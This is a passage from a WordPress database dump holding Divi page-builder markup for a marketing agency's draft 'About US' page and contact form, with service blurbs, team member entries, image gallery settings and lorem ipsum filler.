custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 18:48:01','2020-08-07 18:48:01','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(539,1,'2020-08-07 18:48:17','2020-08-07 18:48:17','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"dhiraj kumar founder \" title_text=\"travel-portrait-06\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" 